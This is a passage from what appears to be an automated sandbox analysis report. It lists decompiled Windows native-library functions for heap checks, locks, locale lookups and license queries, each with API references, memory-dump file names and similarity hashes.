						if(_t52 == 0) {
							_t65 = _t78;
						} else {
							_t65 = (_t58 & 0xffff0000) - ((_t52 & 0x000000ff) << 0x10) + 0x10000;
						}
						if(_t65 == 0 ||  *((intOrPtr*)(_t65 + 0x18)) != _t78 || _t58 <  *((intOrPtr*)(_t65 + 0x24)) || _t58 >=  *((intOrPtr*)(_t65 + 0x28))) {
							goto L37;
						} else {
							goto L13;
						}
					} else {
						goto L37;
					}
				}
			}

0x6ab63fcc
0x6ab63fcf
0x6ab63fd3
0x6abc03b8
0x6abc03c2
0x6abc03e1
0x6abc03e6
0x6abc03c4
0x6abc03d9
0x6abc03de
0x6abc03ef
0x6abc03f0
0x6abc03f9
0x6abc040b
0x6abc040d
0x6abc0414
0x6abc0415
0x6abc0415
0x00000000
0x6ab63fe2
0x6ab63fe2
0x6ab63fe7
0x00000000
0x00000000
0x6ab63fef
0x6ab640b8
0x6ab640d8
0x6ab640ba
0x6ab640ba
0x6ab640ba
0x6ab640c2
0x6ab640ca
0x6ab640a4
0x00000000
0x6ab640a4
0x6ab640cc
0x00000000
0x6ab640c2
0x6ab63ff9
0x6ab6401f
0x6abc03a0
0x00000000
0x00000000
0x6ab64069
0x6ab6406d
0x6ab640dc
0x6ab6406f
0x6ab6406f
0x6ab64074
0x6ab64076
0x6ab64076
0x6ab64079
0x6ab64079
0x6ab6407e
0x6abc03b2
0x00000000
0x00000000
0x6ab64084
0x6ab64084
0x6ab64088
0x00000000
0x00000000
0x6ab6408a
0x6ab64090
0x6ab64092
0x6ab6409d
0x6ab640ad
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab6409d
0x6ab64092
0x00000000
0x6ab6407e
0x6ab64025
0x6ab6402a
0x6ab640d1
0x6ab64030
0x6ab64040
0x6ab64040
0x6ab64048
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab63ff9

APIs

DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,?,?,?,6AC23933,RtlGetUserInfoHeap), ref: 6ABC03D9
DbgPrint.1105(HEAP: ,?,?,?,?,6AC23933,RtlGetUserInfoHeap), ref: 6ABC03E6
DbgPrint.1105(Invalid address specified to %s( %p, %p ),?,?,?,?,?,?,?,6AC23933,RtlGetUserInfoHeap), ref: 6ABC03F9

Strings

Invalid address specified to %s( %p, %p ), xrefs: 6ABC03F4
HEAP[%wZ]: , xrefs: 6ABC03D4
HEAP: , xrefs: 6ABC03E1

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 3558298466-1151232445
Opcode ID: 994d66aab8ebf81c2bc8977933e9b5bb1152b661f06cceb7560b9108775d784d
Instruction ID: 2f6ed56643012ec67bf92abafa2d90f213295342dc684994ed8a26260afaaa0f
Opcode Fuzzy Hash: 994d66aab8ebf81c2bc8977933e9b5bb1152b661f06cceb7560b9108775d784d
Instruction Fuzzy Hash: 01413470204BD0DFEB648B18C5E4B6A77B0EF46308F055469E9568B243DF26D989F713

Uniqueness

Uniqueness Score: -1.00%

Function 6AB99ED0, Relevance: 10.6, APIs: 7, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6AB99ED0(signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v12;
				signed int _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				char _v41;
				char _v42;
				char _v45;
				char _v46;
				void* __ebx;
				void* __edi;
				signed int _t39;
				signed int _t66;
				char _t70;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				signed int _t93;
				signed int _t94;
				void* _t98;

				_push(_t66);
				_t88 =  *__ecx;
				_t70 = 0;
				_t93 = __ecx[1];
				_v40 = __ecx;
				_t39 = __edx;
				asm("cdq");
				_v41 = 0;
				_v42 = 0;
				_v36 = __edx;
				_v16 = __edx;
				L1:
				while(1) {
					if(_t70 != 0) {
						E6AB7FFB0(_t66, _t88, _v40 + 8);
						_v46 = 0;
						L15:
						_t39 = _v36;
						L3:
						_v32 = _t93;
						_v28 = _t88;
						asm("adc eax, esi");
						_t89 = _t88 ^ _t39 + _t88 ^ _t88;
						_t94 = _t93 ^ (_v16 ^ _t93) & 0x0fffffff;
						_t84 = _t94 & 0x0fffffff;
						if((_v32 & 0x80000000) != 0) {
							if((_t89 | _t84) != 0) {
								goto L4;
							}
							_t94 = _t94 & 0x7fffffff;
							_v42 = 1;
							E6AB82280(_v40 + 8, _v40 + 8);
							L5:
							_t66 = _t89;
							asm("lock cmpxchg8b [esi]");
							_t88 = _v28;
							_t93 = _v32;
							_t39 = _v36;
							if(_t88 != _v28 || _t93 != _v32) {
								_t70 = _v41;
								continue;
							} else {
								if(_v42 != 0) {
									_t54 = _v40;
									 *((intOrPtr*)(_v40 + 0xc)) = 0;
									E6AB7FFB0(_t66, _t88, _v40 + 8);
									_t39 = E6AC38858( *((intOrPtr*)(_t54 + 0xc)));
								} else {
									if(_v41 != 0) {
										_t91 = _v40;
										_t98 = _v40 + 0xc;
										E6AC38833(_t98,  &_v12);
										E6AB8FA00(_t66, _t98, _v40, _t91 + 8);
										_push(0);
										_push(_t98);
										_t39 = E6ABAB180();
									}
								}
								return _t39;
							}
						}
						L4:
						if(_a4 != 0) {
							if((_t89 | _t84) == 0) {
								goto L5;
							}
							_t94 = _t94 | 0x80000000;
							_v41 = 1;
							E6AB8FAD0(_v40 + 8);
						}
						goto L5;
					}
					if(_t70 != 0) {
						E6AB8FA00(_t66, _t70, _t88, _v40 + 8);
						_v45 = 0;
						goto L15;
					}
					goto L3;
				}
			}

0x6ab99edf
0x6ab99ee2
0x6ab99ee4
0x6ab99ee6
0x6ab99ee9
0x6ab99eed
0x6ab99eef
0x6ab99ef0
0x6ab99ef4
0x6ab99ef8
0x6ab99efc
0x00000000
0x6ab99f00
0x6ab99f02
0x6abd9836
0x6abd983b
0x6abd9854
0x6abd9854
0x6ab99f10
0x6ab99f12
0x6ab99f1c
0x6ab99f20
0x6ab99f26
0x6ab99f31
0x6ab99f3d
0x6ab99f45
0x6abd9861
0x00000000
0x00000000
0x6abd986b
0x6abd9874
0x6abd987a
0x6ab99f51
0x6ab99f5b
0x6ab99f61
0x6ab99f65
0x6ab99f67
0x6ab99f69
0x6ab99f71
0x6ab99fa7
0x00000000
0x6ab99f79
0x6ab99f7e
0x6abd98a1
0x6abd98a8
0x6abd98b3
0x6abd98ba
0x6ab99f84
0x6ab99f89
0x6abd98c4
0x6abd98cc
0x6abd98d1
0x6abd98da
0x6abd98df
0x6abd98e1
0x6abd98e2
0x6abd98e2
0x6ab99f89
0x6ab99f95
0x6ab99f95
0x6ab99f71
0x6ab99f4b
0x6ab99f4f
0x6ab99f9c
0x00000000
0x00000000
0x6abd9888
0x6abd9891
0x6abd9897
0x6abd9897
0x00000000
0x6ab99f4f
0x6ab99f0a
0x6abd984a
0x6abd984f
0x00000000
0x6abd984f
0x00000000
0x6ab99f0a

APIs

RtlReleaseSRWLockExclusive.1105(?,FFFFFFFE,000000FF,FFFFFFFE), ref: 6ABD9836
RtlReleaseSRWLockShared.1105(?,FFFFFFFE,000000FF,FFFFFFFE), ref: 6ABD984A
RtlAcquireSRWLockExclusive.1105(?), ref: 6ABD987A
RtlAcquireSRWLockShared.1105(?), ref: 6ABD9897
RtlReleaseSRWLockExclusive.1105(?), ref: 6ABD98B3

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lock$ExclusiveRelease$AcquireShared
String ID:
API String ID: 1363392280-0
Opcode ID: 688a337dac4e851413f0ec5f61124e081631620ab6096ab0831448190c3edd25
Instruction ID: 7c9e9ee8e14e2de19c4ccdae235798002e2ef4d0280419ce2184c927b915837b
Opcode Fuzzy Hash: 688a337dac4e851413f0ec5f61124e081631620ab6096ab0831448190c3edd25
Instruction Fuzzy Hash: A041BE7260C2829FC754CF288854B4FFBE5AFC6318F09491DF894A7291DA34E90897D3

Uniqueness

Uniqueness Score: -1.00%

Function 6AB6649B, Relevance: 10.6, APIs: 7, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6AB6649B(signed int __ecx, short* __edx) {
				signed int _v8;
				char _v40;
				void* _v80;
				short _v82;
				char _v84;
				long _v88;
				char _v92;
				void* _v96;
				void* _v98;
				void* _v100;
				void* _v104;
				void* _v106;
				void* _v108;
				void* _v112;
				void* _v120;
				void* _v122;
				void* _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				short _t41;
				void* _t43;
				short _t45;
				void* _t65;
				short* _t71;
				void* _t72;
				void* _t74;
				void* _t76;
				signed int _t77;
				signed int _t79;

				_t69 = __edx;
				_t79 = (_t77 & 0xfffffff8) - 0x5c;
				_v8 =  *0x6ac5d360 ^ _t79;
				_t71 = __edx;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				if(__edx == 0) {
					_t37 = 0xc000000d;
					L7:
					_pop(_t72);
					_pop(_t74);
					_pop(_t65);
					return E6ABAB640(_t37, _t65, _v8 ^ _t79, _t69, _t72, _t74);
				}
				_t75 = __ecx & 0x0000ffff;
				 *__edx = 0;
				_v80 =  &_v40;
				_t41 = 0x1e;
				_v82 = _t41;
				_t43 = E6AB74720(__edx, __ecx & 0x0000ffff,  &_v84, 2, 0);
				if(_t43 < 0) {
					if(_t43 == 0xc0000023) {
						_v80 = 0;
						_v82 = 0;
						_t43 = E6AB74720(__edx, _t75,  &_v84, 2, 1);
					}
					if(_t43 >= 0) {
						goto L2;
					} else {
						_t76 = 0xc000000d;
						L4:
						if(_v88 != _t79 + 0x24) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v88);
						}
						if(_v88 != _t79 + 0x44) {
							RtlFreeHeap( *( *[fs:0x30] + 0x18), 0, _v88);
						}
						_t37 = _t76;
						goto L7;
					}
				}
				L2:
				_v88 = _t79 + 0x28;
				_t45 = 0x1e;
				 *((short*)(_t79 + 0x16)) = _t45;
				_t76 = E6AB72EB0(_t69, _v80,  &_v92, 6, 0);
				if(_t76 < 0) {
					if(_t76 == 0xc0000023) {
						_v88 = 0;
						 *((short*)(_t79 + 0x16)) = 0;
						_t76 = E6AB72EB0(_t69, _v80,  &_v92, 6, 1);
					}
					if(_t76 < 0) {
						goto L4;
					} else {
						goto L3;
					}
				}
				L3:
				if(0 != _v92) {
					_t76 = E6AB74570(_t69, _v88, _t79 + 0x24, 3);
					if(_t76 >= 0) {
						 *_t71 =  *((intOrPtr*)(_t79 + 0x20));
					}
				}
				goto L4;
			}

0x6ab6649b
0x6ab664a3
0x6ab664ad
0x6ab664b6
0x6ab664b8
0x6ab664bc
0x6ab664c0
0x6ab664c4
0x6ab664ca
0x6abc1905
0x6ab66550
0x6ab66554
0x6ab66555
0x6ab66556
0x6ab66561
0x6ab66561
0x6ab664d2
0x6ab664d5
0x6ab664de
0x6ab664e2
0x6ab664e4
0x6ab664f1
0x6ab664f8
0x6abc1914
0x6abc1918
0x6abc191e
0x6abc192b
0x6abc192b
0x6abc1932
0x00000000
0x6abc1938
0x6abc1938
0x6ab66532
0x6ab6653a
0x6abc1984
0x6abc1984
0x6ab66548
0x6abc199c
0x6abc199c
0x6ab6654e
0x00000000
0x6ab6654e
0x6abc1932
0x6ab664fe
0x6ab66504
0x6ab66508
0x6ab6650a
0x6ab6651f
0x6ab66523
0x6abc1948
0x6abc194c
0x6abc1952
0x6abc1967
0x6abc1967
0x6abc196b
0x00000000
0x6abc1971
0x00000000
0x6abc1971
0x6abc196b
0x6ab66529
0x6ab66530
0x6ab66572
0x6ab66576
0x6ab6657d
0x6ab6657d
0x6ab66576
0x00000000

APIs

RtlLcidToLocaleName.1105(?,?,00000002,00000000), ref: 6AB664F1
RtlGetParentLocaleName.1105(00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6AB6651A
RtlLocaleNameToLcid.1105(?,00000006,00000003,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6AB6656D
RtlLcidToLocaleName.1105(?,?,00000002,00000001,?,?,00000002,00000000), ref: 6ABC192B
RtlGetParentLocaleName.1105(00000002,00000002,00000006,00000001,00000002,00000002,00000006,00000000,?,?,00000002,00000000), ref: 6ABC1962

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleName$Lcid$Parent
String ID:
API String ID: 3691507993-0
Opcode ID: e76a91bf800c2e9ce8ce7db4100ca3f9cb55f8b25b791be4417fdb914ea1f1f8
Instruction ID: 609ac6d67980a7d2308b56d13012dc1553e851b3423e62c0444fdf88fd383649
Opcode Fuzzy Hash: e76a91bf800c2e9ce8ce7db4100ca3f9cb55f8b25b791be4417fdb914ea1f1f8
Instruction Fuzzy Hash: E6418D325087869ED311CF28D841A5BB7E9EF84B54F01092AF990E7250EB70CE15ABE3

Uniqueness

Uniqueness Score: -1.00%

Function 6AB94020, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110
nativeCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6AB94020(intOrPtr* _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _v32;
				intOrPtr* _t43;
				char _t69;
				intOrPtr _t76;
				intOrPtr* _t78;

				_t78 = _a4;
				_t69 = 0;
				_t76 =  *[fs:0x30];
				_v32 = 0;
				_v28 = 0;
				_v12 = 0;
				 *((intOrPtr*)(_t78 + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(_t78 + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(_t78 + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				 *((intOrPtr*)(_t78 + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t43 =  *((intOrPtr*)(_t76 + 0x1f4));
				if(_t43 == 0 ||  *_t43 == 0) {
					 *((short*)(_t78 + 0x14)) = 0;
				} else {
					if(E6AB74921(_t78 + 0x14, 0x100, _t43) < 0) {
						 *((short*)(_t78 + 0x14)) = 0;
					}
					_t69 = 0;
				}
				if( *_t78 != 0x11c) {
					if( *_t78 != 0x124) {
						goto L10;
					}
					goto L4;
				} else {
					L4:
					 *((short*)(_t78 + 0x114)) =  *(_t76 + 0xaf) & 0x000000ff;
					 *(_t78 + 0x116) =  *(_t76 + 0xae) & 0x000000ff;
					 *(_t78 + 0x118) = E6AB94190();
					if( *_t78 == 0x124) {
						 *(_t78 + 0x11c) = E6AB94190() & 0x0001ffff;
					}
					 *((char*)(_t78 + 0x11a)) = _t69;
					if(E6AB94710( &_v16) != 0) {
						 *((char*)(_t78 + 0x11a)) = _v16;
					}
					RtlInitUnicodeString( &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
					_push( &_v24);
					_push(4);
					_push( &_v12);
					_push( &_v20);
					_push( &_v32);
					if(E6ABAA9B0() < 0) {
						L10:
						return 0;
					} else {
						if(_v12 == 1) {
							if(_v20 != 4 || _v24 != 4) {
								goto L9;
							} else {
								goto L10;
							}
						}
						L9:
						 *(_t78 + 0x118) =  *(_t78 + 0x118) & 0x0000ffef | 0x00000100;
						if( *_t78 == 0x124) {
							 *(_t78 + 0x11c) =  *(_t78 + 0x11c) & 0xfffdffef | 0x00000100;
						}
						goto L10;
					}
				}
			}

0x6ab9402a
0x6ab9402d
0x6ab94030
0x6ab9403c
0x6ab9403f
0x6ab94042
0x6ab9404b
0x6ab94054
0x6ab9405e
0x6ab94067
0x6ab9406a
0x6ab94072
0x6ab9407f
0x6abd63db
0x6abd63e8
0x6abd63ec
0x6abd63ec
0x6abd63f0
0x6abd63f0
0x6ab94089
0x6ab9414e
0x00000000
0x00000000
0x00000000
0x6ab9408f
0x6ab9408f
0x6ab9409b
0x6ab940ac
0x6ab940bd
0x6ab940c6
0x6ab9415f
0x6ab9415f
0x6ab940cf
0x6ab940dd
0x6ab940e2
0x6ab940e2
0x6ab940f1
0x6ab940f9
0x6ab940fa
0x6ab940ff
0x6ab94103
0x6ab94107
0x6ab9410f
0x6ab9413f
0x6ab94145
0x6ab94111
0x6ab94115
0x6abd63fb
0x00000000
0x6abd640b
0x00000000
0x6abd640b
0x6abd63fb
0x6ab9411b
0x6ab94132
0x6ab9413b
0x6ab94177
0x6ab94177
0x00000000
0x6ab9413b
0x6ab9410f

APIs

RtlGetSuiteMask.1105(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB940B3
RtlGetNtProductType.1105(?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB940D6
RtlInitUnicodeString.1105(?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB940F1
ZwQueryLicenseValue.1105(?,?,?,00000004,?,?,TerminalServices-RemoteConnectionManager-AllowAppServerMode,?,00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB94108
RtlGetSuiteMask.1105(00000000,00000000,?,?,?,?,?,\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion), ref: 6AB94155

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 6AB940E8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: MaskSuite$InitLicenseProductQueryStringTypeUnicodeValue
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode
API String ID: 2592082795-996340685
Opcode ID: f81d7908d0438040bec6f687a8b628dec89ac11dc28014b7518da167e55a08af
Instruction ID: 141982ac6e4954990ddc9da02d0b49a8b8e557a2947759619ad5db2d194b612c
Opcode Fuzzy Hash: f81d7908d0438040bec6f687a8b628dec89ac11dc28014b7518da167e55a08af
Instruction Fuzzy Hash: 75417F75A5478AABC724DFA4C4406EABBF4EF0A314F01493ED5B9C3240EB30A544EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8B8E4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6AB8B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x6ac58748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E6AB6B150();
						} else {
							E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E6AB6B150();
						__eflags =  *0x6ac57bc8;
						if(__eflags == 0) {
							E6AC22073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E6AB8AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}

0x6ab8b8f0
0x6ab8b8f2
0x6ab8b8f4
0x6abd2c4e
0x6abd2c50
0x6abd2c56
0x6abd2c5c
0x6abd2c60
0x6abd2c7f
0x6abd2c84
0x6abd2c62
0x6abd2c77
0x6abd2c7c
0x6abd2c8a
0x6abd2c8f
0x6abd2c94
0x6abd2c9c
0x6abd2ca5
0x6abd2ca5
0x6abd2c9c
0x6abd2c50
0x6ab8b8fa
0x6ab8b902
0x6ab8b921
0x6ab8b921
0x6ab8b924
0x6ab8b924
0x6ab8b927
0x00000000
0x00000000
0x6ab8b929
0x6ab8b92b
0x6ab8b92d
0x6ab8b940
0x00000000
0x6ab8b940
0x6ab8b932
0x6ab8b932
0x00000000
0x6ab8b932
0x00000000
0x6ab8b904
0x6ab8b904
0x6ab8b90a
0x6ab8b90c
0x6ab8b916
0x6ab8b919
0x6ab8b915
0x6ab8b915
0x6ab8b91b
0x6ab8b91b
0x00000000
0x6ab8b910

APIs

DbgPrint.1105(HEAP[%wZ]: ,-0000002C,?,-00000020,?,6AB8B7BF,-00010018,?,00000000,?,-00000018,?), ref: 6ABD2C77
DbgPrint.1105((ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size),?,-00000020,?,6AB8B7BF,-00010018,?,00000000,?,-00000018,?), ref: 6ABD2C8F

Strings

(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 6ABD2C8A
HEAP[%wZ]: , xrefs: 6ABD2C72
HEAP: , xrefs: 6ABD2C7F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Print
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 3558298466-2558761708
Opcode ID: ebab9b6b4bced7f089b390ff4143002dec8636b12430abbe9c86329aba7dfcee
Instruction ID: fb09fd0912b67d0685c2a6f92945e564ce2e9790f9dc48d2a8687677b6fa4e6a
Opcode Fuzzy Hash: ebab9b6b4bced7f089b390ff4143002dec8636b12430abbe9c86329aba7dfcee
Instruction Fuzzy Hash: 5D11BEB13595C2ABD7689A2CC498F2EB7B5EB41724F168169F04ACB352EF34D880F641

Uniqueness

Uniqueness Score: -1.00%

Function 6AB69240, Relevance: 10.6, APIs: 7, Instructions: 63
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E6AB69240(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t46;
				void* _t48;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x6ac3f708);
				E6ABBD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E6ABA95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E6ABA95D0();
				RtlFreeHeap( *( *[fs:0x30] + 0x18),  *0x6ac584c4 + 0xc0000,  *(_t65 + 0x10));
				RtlFreeHeap( *( *[fs:0x30] + 0x18),  *0x6ac584c4 + 0xc0000,  *(_t65 + 0x1c));
				E6AB82280(RtlFreeHeap( *( *[fs:0x30] + 0x18),  *0x6ac584c4 + 0xc0000,  *(_t65 + 0x20)), 0x6ac586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_push( *(_t66 + 0x14));
					E6ABA95D0();
					_push( *(_t66 + 0x10));
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E6ABA95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E6AB69325();
					return E6ABBD0D1(RtlFreeHeap( *( *[fs:0x30] + 0x18),  *0x6ac584c4 + 0xc0000, _t65));
				}
			}

0x6ab69240
0x6ab69242
0x6ab69247
0x6ab6924c
0x6ab6924e
0x6ab69255
0x6ab69257
0x6ab6925a
0x6ab6925f
0x6ab6925f
0x6ab69266
0x6ab69271
0x6ab69276
0x6ab69279
0x6ab69295
0x6ab692b1
0x6ab692d7
0x6ab692dc
0x6ab692e0
0x6ab692e6
0x6ab692e8
0x6ab692ee
0x6ab69332
0x6ab69333
0x6ab69337
0x6ab69338
0x6ab6933a
0x6ab6933d
0x6ab69342
0x6ab69345
0x6ab69349
0x6ab6934e
0x6ab69352
0x6ab69357
0x6ab692f4
0x6ab692f4
0x6ab692f6
0x6ab692f9
0x6ab69300
0x6ab69324
0x6ab69324

APIs

ZwClose.1105(00000000,6AC3F708,0000000C,6AB69219), ref: 6AB6925A
ZwClose.1105(00000000,6AC3F708,0000000C,6AB69219), ref: 6AB69279
RtlFreeHeap.1105(?,?,?,00000000,6AC3F708,0000000C,6AB69219), ref: 6AB69295
RtlFreeHeap.1105(?,?,00000000,?,?,?,00000000,6AC3F708,0000000C,6AB69219), ref: 6AB692B1
RtlFreeHeap.1105(?,?,?,?,?,00000000,?,?,?,00000000,6AC3F708,0000000C,6AB69219), ref: 6AB692CD
RtlAcquireSRWLockExclusive.1105(6AC586B4,?,?,?,?,?,00000000,?,?,?,00000000,6AC3F708,0000000C,6AB69219), ref: 6AB692D7
RtlFreeHeap.1105(?,?,?,6AC586B4,?,?,?,?,?,00000000,?,?,?,00000000,6AC3F708,0000000C), ref: 6AB6931A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$Close$AcquireExclusiveLock
String ID:
API String ID: 3557490396-0
Opcode ID: d43415840f2c0ab75576b971944d288d97118a1fbd2065ce2502963076a98691
Instruction ID: 04e02c39ac027117ee9baec5c5653038ba39e45ba043e47f0b9a6c4fcdc05ff3
Opcode Fuzzy Hash: d43415840f2c0ab75576b971944d288d97118a1fbd2065ce2502963076a98691
Instruction Fuzzy Hash: 73216872152A80DFC721DF28CA14F1AB7F9FF08708F024568E109976A2CF35E951EB84

Uniqueness

Uniqueness Score: -1.00%

Function 6AC34015, Relevance: 10.5, APIs: 7, Instructions: 49
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6AC34015(signed int __eax, void* __ecx) {
				void* __ebx;
				void* __edi;
				char _t10;
				void* _t18;
				void* _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t32 = __ecx + 0x1c;
					E6AB82280(_t10, __ecx + 0x1c);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
